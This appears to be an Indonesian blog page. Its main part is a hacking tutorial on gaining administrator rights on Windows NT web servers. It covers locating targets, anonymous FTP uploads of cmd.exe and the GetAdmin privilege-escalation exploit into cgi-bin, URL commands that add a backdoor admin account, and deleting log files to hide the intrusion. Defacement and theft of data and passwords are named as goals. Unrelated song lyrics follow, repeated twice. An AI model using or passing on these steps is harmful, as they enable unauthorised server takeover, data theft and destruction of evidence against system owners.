teknik Menjadi Admin Pada Windows NT
Wah lagi-lagi sistem operasi windows nih yang jadi korban.Kali ini korban kita adalah Sistem Operasi Windows NT. <--- yang udah bosan dan tahu hentikan bacaan anda sampai disini.
Itulah gambaran kelemahan dari OS Windows, begitu banyak kalangan IT yang telah mengetahuinya selain mudah untuk di Crack sistem operasi ini juga sering menjadi santapan para Script Kiddies dan kabarnya lagi sistem operasi ini menjadi server favorite bagi para Hacker, karena sistem ini sangat gampang untuk dikerjain ( he.he..bukan berarti gue nyarankan lu semua jadi Cracker :)~
Seperti halnya kasus bug Unicode dan CodeRed yang telah menimbulkan bencana besar terhadap server yang berjalan pada sistem operasi windows diseluruh dunia. Maka para admin yang menjalankan sistemnya pada paltform windows ini menjadi kalang kabut bagaikan kambing kebakaran jenggot (mbeee.mbeee..mbeeeeee <-- aduh kacian nih..).
Oke ini hanyalah gambaran dari kasus-kasus yang pernah melanda server yang menggunakan Platform Sistem Operasi windows.
Sekarang marilah kita menjadi penguasa tunggal pada server windows NT, mau tahu caranya ? gampang, namun sebelumnya ikuti dulu sponsor berikut ini:
" PENULIS TIDAK BERTANGGUNG JAWAB ATAS DAMPAK YANG DITIMBULKAN OLEH TUTORIAL INI "
Adapun langkah-langkah persiapan melakukan Crack pada SO windows NT adalah sbb:
==========================
1. Kamu harus memiliki PC (personal Computer) yang terkoneksi ke Internet.
2. Sistem operasi yang digunakan sebaiknya menggunakan SO yang sama dengan korban ( OS Windows NT) kenapa harus menggunakan SO ini..? Karena dengan sistem ini nantinya kita akan gampang untuk mengupload file CMD.EXE dari PC kita dan file ini nantinya akan kita perlukan saat melakukan Crack.
3. Tools-tools pendukung seperti program GetAdmin.exe dan Gasys.dll.
4. Browser seperti IE , Netscape dan NeoPlanet ( NeoPlanet adalah Browser yang digunakan penulis).
Oke setelah persiapan diatas terpenuhi sekarang kita akan melakukan tahap berikutnya yaitu tahap Cracking pada sistem operasi windows NT yang mana tujuan akhir kita adalah untuk mendapatkan password administratornya. Dimana dengan mendapatkan password dari admin ini maka kita akan dapat melakukan apa saja dengan server korban, seperti deface, pencurian data, pencurian password client, dll.
Berikut adalah tahap-tahap dalam melakukan cracking .
============================================
1.Jalankan MS-DOS prompt.
2.Siapkan target yang ingin anda crack, anda dapat mencarinya dengan bantuan search engine seperti google, yahoo, exite, altavista, dan lain-lain. (penulis sendiri lebih senang menggunakan scan engine Operasi Sistem seperti netcraft ).
3. Jalankan FTP anda dengan koneksi tujuan adalah server target dan alangkah baiknya bila anda memiliki program port scanner, karena kita akan mengetahui apakah terget kita akan menjalan kan servis FTP atau tidak. Dan dengan menggunakan program port scanner ini anda dengan mudah nantinya menentukan port-port berapa saja yang terbuka
contoh beberapa port dan nama mesin pengunaan:
---------------------- ----------------------------------------------
Port: Mesin yang bekerja:
====================
21 ftp
22 ssh
23 telnet
80 http
====================
Contoh command dalam melakukan ftp :
C:ftp www.hvd-79.com maka ada pesan :
Connected to www.hvd-79.com 220 medinet microsoft FTP
Service (version 3.0)
User(www.hvd-79.com : (none)): Anonymous (Enter)
Anonymous accses allow, send identify (email name) as
password:
Koneksi ini menjelaskan bahwan nama NetBios dari server adalah medinet. Dan dari sini kita juga akan tahu nama account dari user adalah Anonymous yang digunakan oleh windows NT untuk menjalankan mesin seperti FTP, WWW dan Ghoper pada server tersebut.
Bila saja admin sebelumnya belum pernah mengganti account default pada server tersebut, maka user account internet Anonymousnya adalah IUSR_SATURN.
Sedangkan untuk passwordnya kita hanya perlu memasukan nama email kita atau bisa juga nama email yang kita ciptakan sendiri (coba aja admin@hvd-79.com).
Setelah perintah diatas anda isi semua maka anda sudah diizinkan untuk login pada direktori FTP anda dan silahkan mencoba command cd, dir, untuk masuk dan melihat isi didalam suatu direktori sedangakan perintah put biasanya digunakan oleh para Cracker untuk mengupload atau meletakan trojan pada server korban.
==============================================
Berikut ini saya sertakan juga daftar command yang bisa anda gunakan pada ftp:
==============================================
! delete literal prompt
send
? debug ls put
status
append dir mdelete pwd
trace
ascii disconnect mdir quit
type
bell get mget quote
user
binary glob mkdir recv
verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
===========================================
Namun disini kita juga harus memahami bahwa tidak semua perintah ftp dapat anda gunakan seperti command "put" command ini pada umumnya dibatasi penggunaannya sebab si Admin yang pintar tidak akan mengijinkan accses write untuk user Anonymous dan bila ini kita paksakan maka hasilnya adalah " acces denied ". Terkadang disini admin yang kurang memperhatikan allow setting servernya maka kita akan dizinkan untuk mengupload file apa saja yang kita inginkan.
Selanjutnya jika anda menemukan direktori cgi-bin maka ini adalah suatu keberuntungan. Segeralah masuk ke direktori cgi-bin tersebut dan siapkan file transfer tipe binary dan cobalah mengupload file CMD.EXE dari disk anda.
Contoh perintahnya sebagai berikut:
============================
ftplcd c:winntsystem32
Local directory now C:winntsystem32.
ftpput cmd.exe
226 transfer complate
208144 byte sent in 0,05 second (4639,7 byte/sec)
Kemudian lakukan hal yang sama untuk mengupload file getadmin.exe dan gasys.dll pada direktori yang sama yaitu cgi-bin.
ftplcd c:winntsystem32
Local directory now C:winntsystem32.
ftpput getadmin.exe
226 transfer complate
dan
ftplcd c:winntsystem32
Local directory now C:winntsystem32
ftpput gasys.dll
226 transfer complate
Setelah semuanya selesai anda upload sekarang kita beralih ke browser dan ketikanlah link dibawah ini:
http://www.hvd-79.com/cgi-bin/getadmin.exe?IUSR_MEDINET
setelah beberapa menit kemudian akan muncul pesan cgi-error dan pada tampilan error tersebut terdapat tambahan :
CGI-ERROR
congratulation , now account IUSER_MEDINET have administrator rights.
Nah sekarang ini artinya account Anonymous anda telah berpangakat sama dengan administartor lokal. Dengan demikian maka anda dapat melakukan apa saja terhadap server yang anda crack tersebut seperti yang saya contohkan tadi (melakukan deface, pencurian data, pencurian password client dll).
Namun untuk menjaga account anda agar tetap awet maka anda saya sarankan untuk membuat accout sendiri , kamu bingung dan tak tahu caranya..? gampang kok..
Untuk membuat account baru pada IE anda inilah contohnya :
===============================================
Dimana contoh : User= ntbaruku dan Password = hvd-79 maka ketikanlah link anda seperti dibawah ini:
http://www.hvd-79.com/ cgi-bin/ cmd.exe?/c+ c:winntsystem32net.exe+ ntbaruku+hvd-79+/add
dan untuk membuat anda sebagai administrator ketiklah pada browser anda sebagai berikut :
http://www.hvd-79.com/cgi-bin/getadmin.exe?ntbaruku
Kemudian clik tombol start dan melalui find cari komputer dengan nama www.HvD-79.com setelah komputer tersebut ditemukan clik kanan mouse anda dan klick explore maka pada saat itu pula akan muncul pertanyaan untuk User dan Password maka isikanlah dengan ( ntbaruku dan hvd-79 ) sebagai user dan passwordnya.Dengan langkah ini maka anda telah menjadi admin benaran.
Upss.. tapi anda jangan senang dulu masih ada pekerjaan yang sangat penting yang harus anda lakukan, pekerjaan apakah itu ? Menghilangkan jejak, ya bila anda ingin menjadi seorang hacker handal anda tidak boleh ceroboh karena setiap perintah yang anda ketikan tadi sewaktu melakukan cracking maka logfiles anda akan tertinggal disana dan ini akan membahayakan diri anda sendiri sebab nomor IP anda akan di rekam disana dan ini dapat dimamfaatkan kembali oleh Admin yang sesungguhnya untuk menuntut serta menangkap anda atas perbuatan penyusupan dan perusakan sistem mereka.
Namun berhubung anda telah menjadi seorang Admin maka segeralah menghapus files-files yang tadi anda upload pada direktori cgi-bin yaitu file cmd.exe, getadmin.exe dan gasys.dll karena anda tidak membutuhkannya lagi.
Tindakan penghapusan files-files tadi adalah untuk memastikan jejak anda tidak tertinggal disana yaitu adanya files (cmd.exe, getadmin.exe dan gasys.dll) pada direktori cgi-bin. Dan untuk menghilangkan seluruh logfiles anda yang tertinggal masuklah kedirektori winntsystem32logfiles <-- segera hapus jejak anda yang tertinggal.
Berikutnya kita juga dapat melakukan cracking dengan seluruh accout client yang tersimpan pada informasi SAM (security Account Manager) yang terdapat pada server target dengan menggunakan program seperti l0phtcrack namun karena keterbatasan waktu penulis hanya membahas sampai disini.
Oke sebagai saran penutup penulis mengakui tutorial ini masih memiliki banyak kekurangan jadi bila ada saran atau kritikan anda bisa menghubungi penulis lewat email : x-d@plasa.com
Regard
By. HvD-79
--------------------------------------------------------------------------------
Referensi : - "Kejahatan Internet Trik Aplikasi dan Trik Penaggulangannya" oleh R.Kresno Aji, Denny Siswanto dan Tommy Chandra Wiratama. Penerbit PT.Elex Media Komputindo Kelompok Gramedia, Jakarta (c) 2002.
- Pengalaman pribadi penulis saat melakukan hacking.
- "Cracking windows NT" www.neworder.box.sk .
Tools : Anda dapat mencari melalui internet dengan menggunakan search engine (yahoo, google, exite, altavista dll) dengan kata kunci "download GetAdmin.exe ", "download Gasys.dll" atau "download l0pthcrack". Bila anda sulit untuk mendapatkannya silahkan hubungi penulis melalui email diatas.
Selasa, 09 Desember 2008
seize the day
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
I see my vision burn, I feel my memories fade with time
But I'm too young to worry
These streets we travel on will undergo our same lost past
I found you here, now please just stay for a while
I can move on with you around
I hand you my mortal life, but will it be forever?
I'd do anything for a smile, holding you 'til our time is done
We both know the day will come, but I don't want to leave you
I see my vision burn, I feel my memories fade with time
But I'm too young to worry (a melody, a memory, or just one picture)
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Newborn life replacing all of us, changing this fable we live in
No longer needed here so where do we go?
Will you take a journey tonight, follow me past the walls of death?
But girl, what if there is no eternal life?
I see my vision burn, I feel my memories fade with time
But I'm too young to worry (a melody, a memory, or just one picture)
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Trials in life, questions of us existing here, don't wanna die alone without you here
Please tell me what we have is real
So, what if I never hold you, yeah, or kiss your lips again?
Woooaaah, so I never want to leave you and the memories of us to see
I beg don't leave me
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Trials in life, questions of us existing here, don't wanna die alone without you here
Please tell me what we have is real
Silence you lost me, no chance for one more day [x2 then continues in the background]
I stand here alone
Falling away from you, no chance to get back home
I stand here alone
Falling away from you, no chance to get back home
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
I see my vision burn, I feel my memories fade with time
But I'm too young to worry
These streets we travel on will undergo our same lost past
I found you here, now please just stay for a while
I can move on with you around
I hand you my mortal life, but will it be forever?
I'd do anything for a smile, holding you 'til our time is done
We both know the day will come, but I don't want to leave you
I see my vision burn, I feel my memories fade with time
But I'm too young to worry (a melody, a memory, or just one picture)
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Newborn life replacing all of us, changing this fable we live in
No longer needed here so where do we go?
Will you take a journey tonight, follow me past the walls of death?
But girl, what if there is no eternal life?
I see my vision burn, I feel my memories fade with time
But I'm too young to worry (a melody, a memory, or just one picture)
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Trials in life, questions of us existing here, don't wanna die alone without you here
Please tell me what we have is real
So, what if I never hold you, yeah, or kiss your lips again?
Woooaaah, so I never want to leave you and the memories of us to see
I beg don't leave me
Seize the day or die regretting the time you lost
It's empty and cold without you here, too many people to ache over
Trials in life, questions of us existing here, don't wanna die alone without you here
Please tell me what we have is real
Silence you lost me, no chance for one more day [x2 then continues in the background]
I stand here alone
Falling away from you, no chance to get back home
I stand here alone
Falling away from you, no chance to get back home
Langganan:
Postingan (Atom)
